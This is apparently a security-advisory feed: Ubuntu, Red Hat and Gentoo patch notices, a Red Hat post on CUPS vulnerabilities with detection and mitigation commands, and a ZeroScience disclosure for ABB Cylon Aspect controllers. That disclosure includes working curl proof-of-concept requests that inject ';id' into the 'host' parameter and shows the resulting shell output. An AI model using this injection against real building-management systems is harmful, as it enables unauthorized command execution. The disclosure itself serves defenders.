Ubuntu Security Notice 7021-3 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7021-3September 26, 2024linux-lowlatency, linux-lowlatency-hwe-5.15 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-lowlatency: Linux low latency kernel- linux-lowlatency-hwe-5.15: Linux low latency kernelDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - GPU drivers;  - BTRFS file system;  - F2FS file system;  - GFS2 file system;  - BPF subsystem;  - Netfilter;  - RxRPC session sockets;  - Integrity Measurement Architecture(IMA) framework;(CVE-2024-39494, CVE-2024-38570, CVE-2024-27012, CVE-2024-39496,CVE-2024-42160, CVE-2024-41009, CVE-2024-42228, CVE-2024-26677)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS  linux-image-5.15.0-122-lowlatency  5.15.0-122.132  linux-image-5.15.0-122-lowlatency-64k  5.15.0-122.132  linux-image-lowlatency          5.15.0.122.111  linux-image-lowlatency-64k      5.15.0.122.111Ubuntu 20.04 LTS  linux-image-5.15.0-122-lowlatency  5.15.0-122.132~20.04.1  linux-image-5.15.0-122-lowlatency-64k  5.15.0-122.132~20.04.1  linux-image-lowlatency-64k-hwe-20.04  5.15.0.122.132~20.04.1  linux-image-lowlatency-hwe-20.04  5.15.0.122.132~20.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7021-3  https://ubuntu.com/security/notices/USN-7021-2  https://ubuntu.com/security/notices/USN-7021-1  CVE-2024-26677, CVE-2024-27012, CVE-2024-38570, CVE-2024-39494,  CVE-2024-39496, CVE-2024-41009, CVE-2024-42160, CVE-2024-42228Package Information:  https://launchpad.net/ubuntu/+source/linux-lowlatency/5.15.0-122.132  https://launchpad.net/ubuntu/+source/linux-lowlatency-hwe-5.15/5.15.0-122.132~20.04.1

Ubuntu Security Notice USN-7021-3

Ubuntu Security Notice 7020-3 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7020-3September 26, 2024linux-raspi vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-raspi: Linux kernel for Raspberry Pi systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - GPU drivers;  - Network drivers;  - SCSI drivers;  - F2FS file system;  - BPF subsystem;  - IPv4 networking;(CVE-2024-42160, CVE-2024-42159, CVE-2024-42224, CVE-2024-41009,CVE-2024-42154, CVE-2024-42228)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS  linux-image-6.8.0-1012-raspi    6.8.0-1012.13  linux-image-raspi               6.8.0-1012.13After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7020-3  https://ubuntu.com/security/notices/USN-7020-2  https://ubuntu.com/security/notices/USN-7020-1  CVE-2024-41009, CVE-2024-42154, CVE-2024-42159, CVE-2024-42160,  CVE-2024-42224, CVE-2024-42228Package Information:  https://launchpad.net/ubuntu/+source/linux-raspi/6.8.0-1012.13

Ubuntu Security Notice USN-7020-3

Red Hat Security Advisory 2024-7137-03 - An update for the python39:3.9 module is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.4 Telecommunications Update Service.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_7137.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: python39:3.9 security updateAdvisory ID:        RHSA-2024:7137-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:7137Issue date:         2024-09-25Revision:           03CVE Names:          CVE-2024-6923====================================================================Summary: An update for the python39:3.9 module is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.4 Telecommunications Update Service.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.Security Fix(es):* cpython: python: email module doesn't properly quotes newlines in email headers, allowing header injection (CVE-2024-6923)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6923References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2302255

Red Hat Security Advisory 2024-7137-03

Ubuntu Security Notice 7003-4 - It was discovered that the JFS file system contained an out-of-bounds read vulnerability when printing xattr debug information. A local attacker could use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7003-4September 26, 2024linux-raspi vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-raspi: Linux kernel for Raspberry Pi systemsDetails:It was discovered that the JFS file system contained an out-of-bounds readvulnerability when printing xattr debug information. A local attacker coulduse this to cause a denial of service (system crash). (CVE-2024-40902)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - MIPS architecture;  - PowerPC architecture;  - x86 architecture;  - ACPI drivers;  - Serial ATA and Parallel ATA drivers;  - Drivers core;  - GPIO subsystem;  - GPU drivers;  - Greybus drivers;  - HID subsystem;  - I2C subsystem;  - IIO subsystem;  - InfiniBand drivers;  - Media drivers;  - VMware VMCI Driver;  - Network drivers;  - Pin controllers subsystem;  - S/390 drivers;  - SCSI drivers;  - USB subsystem;  - JFFS2 file system;  - JFS file system;  - File systems infrastructure;  - NILFS2 file system;  - IOMMU subsystem;  - Sun RPC protocol;  - Netfilter;  - Memory management;  - B.A.T.M.A.N. meshing protocol;  - CAN network layer;  - Ceph Core library;  - Networking core;  - IPv4 networking;  - IPv6 networking;  - IUCV driver;  - MAC80211 subsystem;  - NET/ROM layer;  - Network traffic control;  - SoC Audio for Freescale CPUs drivers;(CVE-2024-41034, CVE-2024-40984, CVE-2024-40987, CVE-2024-42119,CVE-2024-42224, CVE-2024-42101, CVE-2024-42096, CVE-2024-41095,CVE-2024-42087, CVE-2024-42104, CVE-2024-42148, CVE-2024-39495,CVE-2024-40980, CVE-2024-42223, CVE-2024-40961, CVE-2024-40988,CVE-2024-42127, CVE-2024-42090, CVE-2024-42236, CVE-2024-40995,CVE-2024-41007, CVE-2024-40968, CVE-2024-40901, CVE-2024-42097,CVE-2024-41041, CVE-2024-36974, CVE-2024-42115, CVE-2024-40978,CVE-2024-38619, CVE-2024-41049, CVE-2024-41035, CVE-2024-41044,CVE-2024-42154, CVE-2024-39499, CVE-2024-42070, CVE-2024-40959,CVE-2024-39487, CVE-2024-42157, CVE-2024-40916, CVE-2024-42076,CVE-2024-41087, CVE-2024-42094, CVE-2024-42124, CVE-2024-40905,CVE-2024-42145, CVE-2024-40963, CVE-2024-36894, CVE-2024-40942,CVE-2024-42092, CVE-2024-42153, CVE-2024-41089, CVE-2024-40912,CVE-2023-52887, CVE-2024-40934, CVE-2024-41006, CVE-2024-39501,CVE-2024-42084, CVE-2024-39506, CVE-2024-39509, CVE-2024-40943,CVE-2024-42106, CVE-2024-42093, CVE-2024-40902, CVE-2024-42086,CVE-2024-40958, CVE-2024-39502, CVE-2024-42232, CVE-2024-42089,CVE-2024-37078, CVE-2024-39469, CVE-2024-41046, CVE-2024-42102,CVE-2024-40974, CVE-2024-39505, CVE-2024-40960, CVE-2024-42105,CVE-2024-40932, CVE-2024-40904, CVE-2024-40981, CVE-2024-39503,CVE-2024-41097, CVE-2024-40941, CVE-2024-36978, CVE-2023-52803,CVE-2024-40945)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS  linux-image-5.4.0-1116-raspi    5.4.0-1116.128  linux-image-raspi               5.4.0.1116.146  linux-image-raspi-hwe-18.04     5.4.0.1116.146  linux-image-raspi2              5.4.0.1116.146  linux-image-raspi2-hwe-18.04    5.4.0.1116.146After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7003-4  https://ubuntu.com/security/notices/USN-7003-3  https://ubuntu.com/security/notices/USN-7003-2  https://ubuntu.com/security/notices/USN-7003-1  CVE-2023-52803, CVE-2023-52887, CVE-2024-36894, CVE-2024-36974,  CVE-2024-36978, CVE-2024-37078, CVE-2024-38619, CVE-2024-39469,  CVE-2024-39487, CVE-2024-39495, CVE-2024-39499, CVE-2024-39501,  CVE-2024-39502, CVE-2024-39503, CVE-2024-39505, CVE-2024-39506,  CVE-2024-39509, CVE-2024-40901, CVE-2024-40902, CVE-2024-40904,  CVE-2024-40905, CVE-2024-40912, CVE-2024-40916, CVE-2024-40932,  CVE-2024-40934, CVE-2024-40941, CVE-2024-40942, CVE-2024-40943,  CVE-2024-40945, CVE-2024-40958, CVE-2024-40959, CVE-2024-40960,  CVE-2024-40961, CVE-2024-40963, CVE-2024-40968, CVE-2024-40974,  CVE-2024-40978, CVE-2024-40980, CVE-2024-40981, CVE-2024-40984,  CVE-2024-40987, CVE-2024-40988, CVE-2024-40995, CVE-2024-41006,  CVE-2024-41007, CVE-2024-41034, CVE-2024-41035, CVE-2024-41041,  CVE-2024-41044, CVE-2024-41046, CVE-2024-41049, CVE-2024-41087,  CVE-2024-41089, CVE-2024-41095, CVE-2024-41097, CVE-2024-42070,  CVE-2024-42076, CVE-2024-42084, CVE-2024-42086, CVE-2024-42087,  CVE-2024-42089, CVE-2024-42090, CVE-2024-42092, CVE-2024-42093,  CVE-2024-42094, CVE-2024-42096, CVE-2024-42097, CVE-2024-42101,  CVE-2024-42102, CVE-2024-42104, CVE-2024-42105, CVE-2024-42106,  CVE-2024-42115, CVE-2024-42119, CVE-2024-42124, CVE-2024-42127,  CVE-2024-42145, CVE-2024-42148, CVE-2024-42153, CVE-2024-42154,  CVE-2024-42157, CVE-2024-42223, CVE-2024-42224, CVE-2024-42232,  CVE-2024-42236Package Information:  https://launchpad.net/ubuntu/+source/linux-raspi/5.4.0-1116.128

Ubuntu Security Notice USN-7003-4

Red Hat Security Advisory 2024-7136-03 - An update for git-lfs is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_7136.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: git-lfs security updateAdvisory ID:        RHSA-2024:7136-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:7136Issue date:         2024-09-26Revision:           03CVE Names:          CVE-2024-34156====================================================================Summary: An update for git-lfs is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Git Large File Storage (LFS) replaces large files such as audio samples, videos, datasets, and graphics with text pointers inside Git, while storing the file contents on a remote server.Security Fix(es):* encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-34156References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2310528

Red Hat Security Advisory 2024-7136-03

Red Hat Security Advisory 2024-7135-03 - An update for git-lfs is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_7135.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: git-lfs security updateAdvisory ID:        RHSA-2024:7135-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:7135Issue date:         2024-09-26Revision:           03CVE Names:          CVE-2024-34156====================================================================Summary: An update for git-lfs is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Git Large File Storage (LFS) replaces large files such as audio samples, videos, datasets, and graphics with text pointers inside Git, while storing the file contents on a remote server.Security Fix(es):* encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-34156References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2310528

Red Hat Security Advisory 2024-7135-03

Ubuntu Security Notice 7035-1 - It was discovered that the AppArmor policy compiler incorrectly generated looser restrictions than expected for rules allowing mount operations. A local attacker could possibly use this to bypass AppArmor restrictions in applications where some mount operations were permitted.

==========================================================================  
Ubuntu Security Notice USN-7035-1  
September 25, 2024

apparmor vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

AppArmor restrictions could be bypassed for rules allowing mount  
operations

Software Description:  
- apparmor: Linux security system

Details:

It was discovered that the AppArmor policy compiler incorrectly generated  
looser restrictions than expected for rules allowing mount operations. A  
local attacker could possibly use this to bypass AppArmor restrictions in  
applications where some mount operations were permitted.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS  
  apparmor                        3.0.4-2ubuntu2.4

Ubuntu 20.04 LTS  
  apparmor                        2.13.3-7ubuntu5.4

In general, a standard system update will make all the necessary changes.  
After this update, applications confined by policies with mount operations  
restrictions may need to have the rules updated.

References:  
  https://ubuntu.com/security/notices/USN-7035-1  
  https://bugs.launchpad.net/apparmor/+bug/1597017  
  CVE-2016-1585

Package Information:  
  https://launchpad.net/ubuntu/+source/apparmor/3.0.4-2ubuntu2.4  
  https://launchpad.net/ubuntu/+source/apparmor/2.13.3-7ubuntu5.4

Ubuntu Security Notice USN-7035-1

TL;DR: All versions of Red Hat Enterprise Linux (RHEL) are affected by CVE-2024-47076, CVE-2024-47175, CVE-2024-47176 and CVE-2024-47177, but are not vulnerable in their default configurations.Red Hat has been made aware of a group of vulnerabilities (CVE-2024-47076, CVE-2024-47175, CVE-2024-47176 and CVE-2024-47177) within OpenPrinting CUPS, an open source printing system that is prevalent in most modern Linux distributions, including RHEL. Specifically, CUPS provides tools to manage, discover and share printers for Linux distributions. By chaining this group of vulnerabilities together, an a

**TL;DR:** _**All versions of Red Hat Enterprise Linux (RHEL) are affected by CVE-2024-47076, CVE-2024-47175, CVE-2024-47176 and CVE-2024-47177, but are not vulnerable in their default configurations.**_

Red Hat has been made aware of a group of vulnerabilities (CVE-2024-47076, CVE-2024-47175, CVE-2024-47176 and CVE-2024-47177) within OpenPrinting CUPS, an open source printing system that is prevalent in most modern Linux distributions, including RHEL. Specifically, CUPS provides tools to manage, discover and share printers for Linux distributions. By chaining this group of vulnerabilities together, an attacker could potentially achieve remote code execution which could then lead to theft of sensitive data and/or damage to critical production systems.

Red Hat rates these issues with a severity impact of Important. While all versions of RHEL are affected, it is important to note that affected packages are not vulnerable in their default configuration. At this time, there are four CVEs assigned to these vulnerabilities, but the exact number is still being coordinated with the upstream community and the researcher who discovered the problem.

**Exploitation**

Exploitation of these vulnerabilities is possible through the following chain of events:

1.  The cups-browsed service has manually been enabled or started
2.  An attacker has access to a vulnerable server, which :
    1.  Allows unrestricted access, such as the public internet, or
    2.  Gains access to an internal network where local connections are trusted
3.  Attacker advertises a malicious IPP server, thereby provisioning a malicious printer
4.  A potential victim attempts to print from the malicious device
5.  Attacker executes arbitrary code on victim’s machine

**Detection**

Red Hat customers should use the following command to determine if cups-browsed is running:

    $ sudo systemctl status cups-browsed

If the result includes “Active: inactive (dead)” then the exploit chain is halted and the system is not vulnerable

If the result is “running” or “enabled,”and the “BrowseRemoteProtocols” directive contains the value “cups” in the configuration file /etc/cups/cups-browsed.conf, then the system is vulnerable.

**Mitigation**

Mitigation of these vulnerabilities is as simple as running two commands, especially in any environment where printing is not needed.

To stop a running cups-browsed service, an administrator should use the following command:

    $ sudo  systemctl stop cups-browsed

The cups-browsed service can also be prevented from starting on reboot with:

    $ sudo systemctl disable cups-browsed

Red Hat and the broader Linux community are currently working on patches to address these issues as well.

**Acknowledgements**

Red Hat would like to thank Simone “EvilSocket” Margaritelli for discovering and reporting these vulnerabilities and Till Kamppeter (OpenPrinting) for additional coordination support.

**For more information**

Read the Red Hat Security Bulletin on these vulnerabilities

Enter keywords here to search blogs

UI\_Icon-Red\_Hat-Close-A-Black-RGB

**Browse by channel**

**Automation**

The latest on IT automation for tech, teams, and environments

**Security**

The latest on how we reduce risks across environments and technologies

**Edge computing**

Updates on the platforms that simplify operations at the edge

**Infrastructure**

The latest on the world’s leading enterprise Linux platform

**Applications**

Inside our solutions to the toughest application challenges

**Original shows**

Entertaining stories from the makers and leaders in enterprise tech

Red Hat’s response to OpenPrinting CUPS vulnerabilities: CVE-2024-47076, CVE-2024-47175, CVE-2024-47176 and CVE-2024-47177

The ABB Cylon Aspect version 3.07.00 BMS/BAS controller suffers from an unauthenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the host HTTP GET parameter called by networkDiagAjax.php script.

  
ABB Cylon Aspect 3.07.00 (networkDiagAjax.php) Remote Code Execution

Vendor: ABB Ltd.  
Product web page: https://www.global.abb  
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
                  Firmware: <=3.07.00

Summary: ASPECT is an award-winning scalable building energy management  
and control solution designed to allow users seamless access to their  
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from an unauthenticated OS command  
injection vulnerability. This can be exploited to inject and execute arbitrary  
shell commands through the 'host' HTTP GET parameter called by networkDiagAjax.php  
script.

Tested on: GNU/Linux 3.15.10 (armv7l)  
           GNU/Linux 3.10.0 (x86_64)  
           GNU/Linux 2.6.32 (x86_64)  
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
           PHP/7.3.11  
           PHP/5.6.30  
           PHP/5.4.16  
           PHP/4.4.8  
           PHP/5.3.3  
           AspectFT Automation Application Server  
           lighttpd/1.4.32  
           lighttpd/1.4.18  
           Apache/2.2.15 (CentOS)  
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)  
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic (2024) and Prism Infosec (2022)  
                            @zeroscience

Advisory ID: ZSL-2024-5829  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5829.php  
CVE ID: CVE-2023-0636  
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-0636

21.04.2024

--

$ cat project

                 P   R   O   J   E   C   T

                        .|  
                        | |  
                        |'|            ._____  
                ___    |  |            |.   |' .---"|  
        _    .-'   '-. |  |     .--'|  ||   | _|    |  
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |  
     |' | |.    |    ||       | |   |  |    ||      |  
 ____|  '-'     '    ""       '-'   '-.'    '`      |____  
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░    
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                              
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░   
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░   
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               

                                                                                                               $ curl http://192.168.73.31/networkDiagAjax.php?command=traceroute&host=;id  
$ curl http://192.168.73.31/networkDiagAjax.php?command=nslookup&host=;id  
$ curl http://192.168.73.31/networkDiagAjax.php?command=ping&host=;id  
uid=33(www-data) gid=33(www-data) groups=33(www-data)

ABB Cylon Aspect 3.07.00 Remote Code Execution

Gentoo Linux Security Advisory 202409-25 - Multiple vulnerabilities have been found in Xpdf, the worst of which could result in denial of service. Versions greater than or equal to 4.05 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-25  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Xpdf: Multiple Vulnerabilities  
     Date: September 25, 2024  
     Bugs: #845027, #908037, #936407  
       ID: 202409-25

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in Xpdf, the worst of which  
could result in denial of service.

Background  
==========

Xpdf is an X viewer for PDF files.

Affected packages  
=================

Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
app-text/xpdf  < 4.05        >= 4.05

Description  
===========

Multiple vulnerabilities have been discovered in Xpdf. Please review the  
CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Xpdf users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-text/xpdf-4.05"

References  
==========

[ 1 ] CVE-2018-7453  
      https://nvd.nist.gov/vuln/detail/CVE-2018-7453  
[ 2 ] CVE-2018-16369  
      https://nvd.nist.gov/vuln/detail/CVE-2018-16369  
[ 3 ] CVE-2022-30524  
      https://nvd.nist.gov/vuln/detail/CVE-2022-30524  
[ 4 ] CVE-2022-30775  
      https://nvd.nist.gov/vuln/detail/CVE-2022-30775  
[ 5 ] CVE-2022-33108  
      https://nvd.nist.gov/vuln/detail/CVE-2022-33108  
[ 6 ] CVE-2022-36561  
      https://nvd.nist.gov/vuln/detail/CVE-2022-36561  
[ 7 ] CVE-2022-38222  
      https://nvd.nist.gov/vuln/detail/CVE-2022-38222  
[ 8 ] CVE-2022-38334  
      https://nvd.nist.gov/vuln/detail/CVE-2022-38334  
[ 9 ] CVE-2022-38928  
      https://nvd.nist.gov/vuln/detail/CVE-2022-38928  
[ 10 ] CVE-2022-41842  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41842  
[ 11 ] CVE-2022-41843  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41843  
[ 12 ] CVE-2022-41844  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41844  
[ 13 ] CVE-2022-43071  
      https://nvd.nist.gov/vuln/detail/CVE-2022-43071  
[ 14 ] CVE-2022-43295  
      https://nvd.nist.gov/vuln/detail/CVE-2022-43295  
[ 15 ] CVE-2022-45586  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45586  
[ 16 ] CVE-2022-45587  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45587  
[ 17 ] CVE-2023-2662  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2662  
[ 18 ] CVE-2023-2663  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2663  
[ 19 ] CVE-2023-2664  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2664  
[ 20 ] CVE-2023-3044  
      https://nvd.nist.gov/vuln/detail/CVE-2023-3044  
[ 21 ] CVE-2023-3436  
      https://nvd.nist.gov/vuln/detail/CVE-2023-3436

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-25

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Tag

#linux